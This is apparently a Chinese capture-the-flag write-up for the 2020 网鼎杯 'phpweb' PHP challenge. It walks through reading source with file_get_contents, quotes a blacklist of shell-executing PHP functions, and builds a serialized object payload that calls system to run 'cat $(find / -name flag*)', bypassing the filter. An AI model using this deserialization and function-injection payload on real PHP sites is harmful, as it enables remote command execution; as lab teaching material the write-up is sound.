[网鼎杯 2020 朱雀组]phpweb

打开靶机后发现页面上有一段警告信息

并且上面的时间会随着当前时间的变化而变化

访问页面源代码发现有两个传参点

html 复制代码
<p>2026-01-30 06:45:30 am</p>
<form id=form1 name=form1 action="index.php" method=post>
  <input type=hidden id=func name=func value='date'>
  <input type=hidden id=p name=p value='Y-m-d h:i:s a'>
</form>

这里定义了func参数是一个接收函数,p参数是函数执行后的内容

抓包后发现传入点在请求体中

调用 PHP 中的 file_get_contents 函数读取源代码

题目提示这个网站是用php搭建的

那就尝试构造payload

html 复制代码
func=file_get_contents&p=index.php

file_get_contents()函数

file_get_contents() 函数在文件操作中的主要作用是读取本地文件的内容。

发现成功读取到源代码

对源代码进行代码审计

php 复制代码
$disable_fun = array(
    "exec ", "shell_exec ", "system ", "passthru ", "proc_open ", 
    "show_source ", "phpinfo ", "popen ", "dl ", "eval ", ... // 共30+个危险函数
);
if (in_array($func, $disable_fun)) {
    die("Hacker...");
}

过滤了多个能进行命令注入的函数

并替换成空格收尾

php 复制代码
class Test {
    var $p = "Y-m-d h:i:s a ";
    var $func = "date ";
    function __destruct() {
        if ($this->func != " ") {
            echo gettime($this->func, $this->p); // 动态调用函数
        }
    }
}

function gettime($func, $p) {
    return $func($p); 
}

**__destruct()**在对象销毁时自动触发

gettime() 会执行 func( p),即可控函数调用

利用反序列化进行绕过

黑名单只检查初始func参数,但反序列化后对象属性中的system不会被二次校验

构造一个本地Test对象并以序列化进行输出

php 复制代码
<?php
class Test {
    var $p = "cat $(find / -name flag*)";
    var $func = "system";
}
$testObject = new Test();
$serializedResult = serialize($testObject);
echo $serializedResult;
?>


#O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}

利用unserialize函数进行反序列化注入

payload如下

php 复制代码
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}

flag{cb6ecf44-2a91-4410-93ec-d53d62844c7f}

参考

2.[网鼎杯 2020 朱雀组]phpweb

相关推荐
盖头盖1 天前
【PHP_原生函数的利用】
php
Jerry_Gao9212 天前
【CTF】【ez-inject】通过协议层Length字段的溢出进行注入
网络安全·ctf
JienDa2 天前
HaiO安装与快速开始
开发语言·php
~央千澈~2 天前
抖音弹幕游戏开发之第16集:异常处理与稳定性·优雅草云桧·卓伊凡
开发语言·php
JienDa2 天前
Haio · 海鸥 - 企业级插件化应用平台
开发语言·php
unable code2 天前
流量包取证-大流量分析
网络安全·ctf·misc·1024程序员节·流量包取证
сокол2 天前
【网安-Web渗透测试-漏洞系列】逻辑漏洞(或越权漏洞)
web安全·php
сокол2 天前
【网安-Web渗透测试-漏洞系列】XXE漏洞
xml·web安全·php
unable code3 天前
浏览器取证-[GKCTF 2021]FireFox Forensics
网络安全·ctf·misc·1024程序员节·浏览器取证
сокол3 天前
【网安-Web渗透测试-漏洞系列】文件包含&下载读取
web安全·php